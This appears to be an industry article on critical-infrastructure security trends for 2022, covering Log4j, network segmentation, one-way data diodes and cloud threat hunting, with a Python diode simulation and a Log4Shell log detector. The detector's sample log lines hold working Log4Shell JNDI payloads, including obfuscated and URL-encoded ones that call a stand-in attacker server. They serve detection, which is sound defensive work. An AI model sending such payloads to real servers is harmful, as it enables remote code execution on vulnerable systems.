
Critical Infrastructure Cybersecurity Trends to Watch in 2022

2021 was an interesting year for critical infrastructure cybersecurity, and not in a good way. 

Along with the headlines we expect every year, ransomware attacks and newly discovered software vulnerabilities, last year gave us an unprecedented look at the real-world consequences that can follow from an attack against critical systems. In February, an intruder used a remote access tool to try to raise the sodium hydroxide level in the Oldsmar, Florida water supply; in May, the ransomware-driven Colonial Pipeline shutdown caused fuel shortages along the East Coast. And the December disclosure of the Log4j remote code execution vulnerability (CVE-2021-44228, widely known as Log4Shell) opened up a class of exposure that may take years to close out.

Fortunately, the power industry was not at the center of any of the year's top cybersecurity stories, likely in part because it has historically led other sectors in developing and implementing security programs for operational technology (OT). But there can be no doubt that threat actors continue to seek new ways to attack and disrupt the electrical grid.

In 2022, the power industry and other critical infrastructure sectors will need to further strengthen their cyber defenses, while simultaneously taking advantage of cloud services and other technology to improve their efficiency and resilience. Here’s what to expect.

Continued Log4j Fallout

The Log4j remote code execution vulnerability will remain a primary focus for security teams in every sector of critical infrastructure. The flaw sits in a logging library embedded in Java applications, including many vendor products whose operators do not know it is there, and affects Log4j 2.x releases before 2.15.0 (with follow-on fixes in later releases). With hundreds of millions of devices potentially affected and no reliable way to find them from the outside, it will be years before every vulnerable machine has been identified and remediated.

In the meantime, network segmentation will be the most effective compensating control while patching lags. If industrial devices are isolated in networks that threat actors cannot see and cannot reach, the chances of a catastrophic attack are dramatically lower. Egress filtering matters just as much as inbound blocking here: the common Log4Shell exploit path requires the vulnerable host to open an outbound JNDI connection (LDAP or RMI) to a server the attacker controls, so an OT segment that is denied arbitrary outbound access blocks that path even before the library is updated.

Secure Cloud Connectivity to Monitor Asset Performance

Given the increase in cloud connectivity and utilization, fully air-gapped OT environments are no longer a viable option for most critical infrastructure operators. When data is trapped inside facilities and cannot be retrieved without physically visiting them, operators lose visibility into organization-wide device status and performance.

To maximize efficiency and plan maintenance, organizations need the ability to send data from secure OT networks to cloud-based analytics platforms. Doing this securely is the challenge, given Log4j and hundreds of other potential threats. The requirement is to get the needed OT data out to the enterprise without creating a path back in: the connection must preserve the isolation of the OT environment while still delivering the telemetry the business depends on.

Look for the continued adoption of hardware-enforced one-way data transfer solutions (data diodes), which physically permit traffic in only one direction, so data can leave the secure network while nothing, not even a TCP acknowledgement, can come back in. That property has a consequence for the protocols that run over them: with no return path there is no retransmission, so the transfer layer itself has to tolerate loss and verify integrity on the receiving side.
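To make the "no return path" constraint concrete, here is an added simulation of a one-way transfer, written for this article rather than taken from any diode vendor's product. It assumes a simple JSON frame format of my own (sequence number, total count, SHA-256 of the whole message, base64 chunk), a constructed lossy link that silently discards every fifth frame, and a constructed telemetry payload. The sender repeats each frame instead of waiting for ACKs; the receiver reassembles, tolerates duplicates, reports gaps and rejects a message whose digest does not match.

```python
import base64
import hashlib
import json

CHUNK_SIZE = 16  # tiny on purpose, so the sample payload spans many frames


def build_frames(payload, redundancy=2):
    """Split payload into self-describing frames and emit each one `redundancy` times.
    Nothing can come back through the diode, so repetition (or a real forward error
    correction code) stands in for the retransmission a normal protocol would use."""
    chunks = [payload[i:i + CHUNK_SIZE] for i in range(0, len(payload), CHUNK_SIZE)]
    digest = hashlib.sha256(payload).hexdigest()
    frames = []
    for seq, chunk in enumerate(chunks):
        frame = {"seq": seq, "total": len(chunks), "sha256": digest,
                 "data": base64.b64encode(chunk).decode()}
        frames.extend([json.dumps(frame, sort_keys=True).encode()] * redundancy)
    return frames


def lossy_channel(frames, drop_every=5, offset=3):
    """Constructed stand-in for the one-way link: silently drops every fifth frame.
    The sender never learns about the loss, which is the whole point of the exercise."""
    return [f for i, f in enumerate(frames) if i % drop_every != offset]


class Receiver:
    """Enterprise-side reassembler. It can only consume, validate and report gaps."""

    def __init__(self):
        self.chunks = {}
        self.total = None
        self.digest = None

    def feed(self, raw):
        try:
            frame = json.loads(raw)
            seq, total, digest = int(frame["seq"]), int(frame["total"]), str(frame["sha256"])
            data = base64.b64decode(frame["data"], validate=True)
        except (ValueError, KeyError, TypeError):
            return  # malformed frame: discard it; there is nobody to ask for a resend
        if self.total is None:
            self.total, self.digest = total, digest
        if total != self.total or digest != self.digest or not 0 <= seq < total:
            return  # stray frame from another message, or out of range
        self.chunks.setdefault(seq, data)  # duplicates are expected and harmless

    def result(self):
        """Return (payload, missing_seqs). payload is None until every chunk has
        arrived and the whole message matches the digest the sender announced."""
        if self.total is None:
            return None, []
        missing = sorted(set(range(self.total)) - set(self.chunks))
        if missing:
            return None, missing
        payload = b"".join(self.chunks[i] for i in range(self.total))
        if hashlib.sha256(payload).hexdigest() != self.digest:
            return None, []
        return payload, []


def transfer(payload, redundancy):
    """Run one message across the simulated diode and return the receiver's verdict."""
    rx = Receiver()
    for raw in lossy_channel(build_frames(payload, redundancy)):
        rx.feed(raw)
    return rx.result()


# Constructed sample telemetry, not data from any real plant.
SAMPLE_PAYLOAD = b"ts=1641000000 unit=GT1 rpm=3600 exhaust_c=512 vib_mm_s=2.1\n" * 4

if __name__ == "__main__":
    for redundancy in (1, 2):
        payload, missing = transfer(SAMPLE_PAYLOAD, redundancy)
        print(f"redundancy={redundancy}: ok={payload == SAMPLE_PAYLOAD} missing={missing}")
```

With redundancy 1 the receiver ends up with holes it can only report, never repair; with redundancy 2 the same link delivers the whole message. Production diode software uses proper forward error correction rather than blind repetition, but the design constraint is identical: every decision about loss and integrity has to be made on the receiving side, because the sender will never hear from it.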

Cloud-Based Threat Hunting and Asset Health

OT-to-cloud connectivity has other benefits as well, including helping organizations improve their security posture. By sending network and application logs out of OT facilities (again, over one-way transfer) to cloud-based security information and event management (SIEM) platforms, critical infrastructure operators can identify and remediate threats that would otherwise go unnoticed inside an isolated network that nobody is watching.
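As an added example of the kind of detection logic a SIEM would run over logs shipped out of an OT facility, and tying back to the Log4j section above, here is a small Log4Shell probe detector written for this article (not code from any SIEM product). It assumes constructed web-server access-log lines with documentation-range addresses, and it normalizes the evasions seen in real probing: URL encoding, and Log4j's own nested lookups (`${lower:...}`, `${upper:...}`, `${...:-x}` defaults) used to spell out "jndi" without ever writing it.

```python
import re
import urllib.parse

# Constructed access-log lines (not real traffic); addresses are from documentation
# ranges. Lines 1-4 carry Log4Shell probes in progressively more obfuscated forms;
# lines 0 and 5 are benign (5 contains a Log4j lookup, but not a JNDI one).
SAMPLE_LOGS = [
    '203.0.113.4 - - [11/Dec/2021:03:14:07 +0000] "GET /status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:L}dap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:14:13 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.9 - - [11/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/a}"',
    '203.0.113.4 - - [11/Dec/2021:03:14:17 +0000] "GET /?year=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

_INNER = re.compile(r"\$\{([^${}]*)\}")  # an innermost ${...} lookup, nothing nested inside
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(body):
    """Evaluate one innermost lookup the way Log4j would for the forms attackers use
    to hide the string 'jndi'. Returns None for anything we do not model, so that an
    unknown lookup is left in place and the normalization loop terminates."""
    if body.lower().startswith("jndi:"):
        return None  # this is what we are hunting for; leave it intact
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${env:NOPE:-x} and ${::-x} both evaluate to 'x'
    return None


def normalize(text, max_rounds=8):
    """Undo URL encoding (twice, for double-encoded probes), then collapse nested
    lookups from the inside out until nothing changes or the round limit is hit."""
    text = urllib.parse.unquote(urllib.parse.unquote(text))
    for _ in range(max_rounds):
        changed = False

        def sub(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = _INNER.sub(sub, text)
        if not changed:
            break
    return text


def scan(lines):
    """Return one hit per line that contains a JNDI lookup after normalization."""
    hits = []
    for idx, line in enumerate(lines):
        norm = normalize(line)
        match = JNDI.search(norm)
        if not match:
            continue
        end = norm.find("}", match.start())
        payload = norm[match.start():end + 1] if end != -1 else norm[match.start():match.start() + 80]
        hits.append({"line": idx, "scheme": match.group(1).lower(), "payload": payload})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```

Two caveats a practitioner would want stated. First, this catches the obfuscations it models and no others; Log4j's lookup language is rich enough that signature matching will always have misses, which is exactly why the egress filtering described above is the control that actually stops the exploit. Second, a hit tells you a probe arrived, not that anything was vulnerable; the follow-up is to check whether the targeted host made an outbound LDAP or RMI connection to the address in the payload, which is the evidence of a real callback.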

Cloud-based threat hunting and asset health monitoring have rapidly gained adoption in recent years, and should become even more widely used as organizations seek ways to minimize the impact of zero-day vulnerabilities and other cyber threats.

2022 is sure to have plenty of surprises in store. But with continued attention to network segmentation, secure connectivity, and proactive threat detection, the power industry can stay a step ahead of threats to the infrastructure we all depend on.